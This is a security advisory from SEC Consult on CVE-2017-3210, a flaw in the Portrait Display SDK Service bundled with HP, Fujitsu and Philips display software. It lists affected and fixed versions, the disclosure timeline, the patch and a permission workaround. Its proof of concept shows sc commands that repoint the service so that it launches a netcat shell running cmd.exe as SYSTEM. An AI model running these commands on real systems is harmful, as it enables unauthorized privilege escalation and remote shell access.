Portrait Display SDK Service Privilege Escalation

`SEC Consult Vulnerability Lab Security Advisory < 20170425-0 >  
=======================================================================  
title: Privilege Escalation due to insecure service configuration  
product: Portrait Display SDK Service  
vulnerable version: mutliple, see PoC  
fixed version: multiple, see solution  
CVE number: CVE-2017-3210  
impact: critical  
homepage: http://www.portrait.com/  
found: 2017-02-23  
by: W. Schober (Office Vienna)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow  
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich  
  
https://www.sec-consult.com  
=======================================================================  
  
Vendor description:  
-------------------  
"For nearly 20 years, Portrait Displays has provided customized software to  
OEM monitor manufacturers across the globe. We develop tailored solutions,  
encompassing the needs of todayas changing marketplace.  
  
Our technologies allow OEMs to provide their end users with a premium  
interactive experience. Our engineers work hand-in-hand with leading OEMS,  
ODMs, and GPU and scaler companies, to develop and implement cutting-edge  
software solutions."  
  
Source: http://www.portrait.com/technology.html  
  
  
Business recommendation:  
------------------------  
SEC Consult recommends not to use this service in a production environment  
until a thorough security review has been performed by security professionals  
and all identified issues have been resolved.  
  
  
Vulnerability overview/description:  
-----------------------------------  
The Portrait Display SDK Service (PdiService.exe) configuration was found to  
be writable for every authenticated user in a default installation. This would  
allow an attacker to execute arbitrary code, elevate his privileges and gain a  
shell with the privileges of the SYSTEM user.  
  
The Portrait Display SDK Service is used in various different OEM software,  
which is shipped per default on a wide range of notebooks. The software, where  
the SDK is included is used as an virtual OSD (On Screen Display) for "tuning"  
displays, setting gamma values, changing color values etc.  
  
The vulnerability was identified in the software "DisplayView Click" from  
Fujitsu. Due to the fact, that this SDK is used in several software packages,  
SEC Consult tried to identify other potential vulnerable software packages,  
which got rebranded by Portrait Displays, Inc. The following list contains an  
excerpt of packages containing the SDK, which are partially installed per  
default on  
notebooks of HP, Philips,Fujitsu, etc.  
  
  
-) Fujitsu DisplayView Click v5  
-) Fujitsu DisplayView Click v6  
-) HP Display Assistant  
-) HP Display Control  
-) HP Mobile Display Assistant v1  
-) HP Mobile Display Assistant v2  
-) HP My Display  
-) HP My Display All-In-One/TouchSmart  
-) HP Picture in Picture  
-) Philips SmartControl II  
-) Philips SmartControl Lite  
-) Philips SmartControl Premium  
  
  
Portait Displays Inc. confirmed that at least the following packages are  
vulnerable:  
  
Fujitsu DisplayView Click  
Version 6.0 build id: dtune-fts-R2014-04-22-1630-07, 6.01  
build id: dtune-fts-R2014-05-13-1436-35  
The issue was fixed in Version 6.3 build id: dtune-fts-R2016-03-07-1133-51  
  
Fujitsu DisplayView Click Suite Version 5  
build id: dtune-fus-R2012-09-26-1056-32  
The issue is addressed by patch in Version 5.9 build id:  
dtune-fus-R2017-04-01-1212-32  
  
HP Display Assistant Version 2.1  
build id: dtune-hwp-R2012-10-31-1329-38  
The issue was fixed in Version 2.11 build id: dtune-hwp-R2013-10-11-1504-22  
and above  
  
HP My Display Version 2.01  
build id: dtune-hpc-R2013-01-10-1507-17  
The issue was fixed in Version 2.1 build id: dtune-hpc-R2014-06-27-1655-15 and  
above  
  
Philips Smart Control Premium  
Versions with issue: 2.23 build id: dtune-plp-R2013-08-12-1215-13, 2.25  
build id: dtune-plp-R2014-08-29-1016-05  
The issue was fixed in Version 2.26 build id: dtune-plp-R2014-11-14-1813-07  
  
Furthermore, a more detailed summary of this advisory has been published at our  
blog:  
http://blog.sec-consult.com/2017/04/what-unites-hp-philips-and-fujitsu-one.html  
  
Proof of concept:  
-----------------  
To identify the permissions of the service the builtin Windows command "sc" was  
used. The output of the command for the vulnerable service can be seen below:  
  
(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)  
(A;;CCLCSWRPWPDTLOCRRC;;;SY)  
(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)  
(A;;CCLCSWLOCRRC;;;IU)  
(A;;CCLCSWLOCRRC;;;SU)  
  
By "converting" the Security Descriptor Definition Language into human readable  
words, SEC Consult was able to identify the following permissions for the  
PdiService:  
  
RW NT AUTHORITY\Authenticated Users  
RW NT AUTHORITY\SYSTEM  
RW BUILTIN\Administrators  
R NT AUTHORITY\INTERACTIVE  
R NT AUTHORITY\SERVICE  
  
Due to the fact, that every authenticated user has write access on the service,  
an attacker is able to execute arbitrary code by changing the services binary  
path. Moreover, all Windows services are executed with SYSTEM permissions,  
resulting in privilege escalation.  
  
The workflow to execute arbitrary code is as follows:  
1) Stop Service  
sc stop pdiservice  
2) Alter service binary path  
sc config pdiservice binpath= "C:\nc.exe -nv 127.0.0.1 4242 -e  
C:\WINDOWS\System32\cmd.exe"  
3) Start Service  
sc start pdiservice  
  
  
Vulnerable / tested versions:  
-----------------------------  
The following list contains all vulnerable versions:  
  
Fujitsu DisplayView Click  
Version 6.0 build id: dtune-fts-R2014-04-22-1630-07, 6.01  
build id: dtune-fts-R2014-05-13-1436-35  
The issue was fixed in Version 6.3 build id: dtune-fts-R2016-03-07-1133-51  
  
Fujitsu DisplayView Click Suite Version 5  
build id: dtune-fus-R2012-09-26-1056-32  
The issue is addressed by patch in Version 5.9 build id:  
dtune-fus-R2017-04-01-1212-32  
  
HP Display Assistant Version 2.1  
build id: dtune-hwp-R2012-10-31-1329-38  
The issue was fixed in Version 2.11 build id: dtune-hwp-R2013-10-11-1504-22  
and above  
  
HP My Display Version 2.01  
build id: dtune-hpc-R2013-01-10-1507-17  
The issue was fixed in Version 2.1 build id: dtune-hpc-R2014-06-27-1655-15 and  
above  
  
Philips Smart Control Premium  
Versions with issue: 2.23 build id: dtune-plp-R2013-08-12-1215-13, 2.25  
build id: dtune-plp-R2014-08-29-1016-05  
The issue was fixed in Version 2.26 build id: dtune-plp-R2014-11-14-1813-07  
  
  
Vendor contact timeline:  
------------------------  
2017-03-01: Contacting vendor through email [email protected]  
2017-03-01: Informing CERT/CC, asking for coordination support regarding HW  
vendors, assigned VU#219739  
2017-03-01: The vendor responds and requests all attachments as plaintext in  
the email body because they are not allowed to open any attachements  
from "unknown parties".  
Therefore SEC Consult sends the PGP Public Keys as plaintext in the  
body of the email.  
2017-03-08: Contacting vendor again on how to transmit the advisory; no answer  
2017-03-15: Informing CERT/CC about the status, asking for support to contact  
the vendor  
2017-03-16: The Vendor provides a public key for encrypted communication;  
The advisory got securely transmitted to the vendor.  
2017-03-18: The vendor responds and confirms that they were able to reproduce  
the vulnerability. Detailed information, on which Brands are  
affected, as well as a timeline for an update will be provided next  
week.  
2017-03-28: Requesting update from Portrait Displays Inc. Asking about current  
state and a list of affected vendors.  
2017-03-29: Vendors responds that they are still in the process of evaluating  
on, which 3rd parties are affected.  
2017-04-06: Vendor updates us with information about the planed release schedule  
and affected vendors. Portrait is still in the progress of  
evaluating on, which3rd parties are affected. The list should be  
available at the end of the week. A patch that removes the invalid  
permission will be available on the vendors website.  
2017-04-17: Vendor provides us with a detailed list of affected products.  
2017-04-18: Vendor publicly releases a patch for the vulnerability on their  
website (http://www.portrait.com/securityupdate.html)  
2017-04-21: SEC Consult requests a CVE from CERT/CC and coordinates the  
disclosure of the CERT VU and the SEC Consult advisory.  
2017-04-25: Public release.  
  
Solution:  
---------  
Since the 18th of April 2017 a patch is available.  
See: http://www.portrait.com/securityupdate.html  
  
Workaround:  
-----------  
To quickly get rid of the vulnerability, the permissions of the service should  
be altered with the built-in windows command "sc". To completely remove the  
permissions of the "Authenticated Users" group, the following command can be  
used:  
  
sc sdset pdiservice  
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)  
(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)  
  
This will result in the following set of permissions:  
RW NT AUTHORITY\SYSTEM  
RW BUILTIN\Administrators  
R NT AUTHORITY\INTERACTIVE  
R NT AUTHORITY\SERVICE  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow  
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/Career.htm  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF W. Schober / @2017  
  
`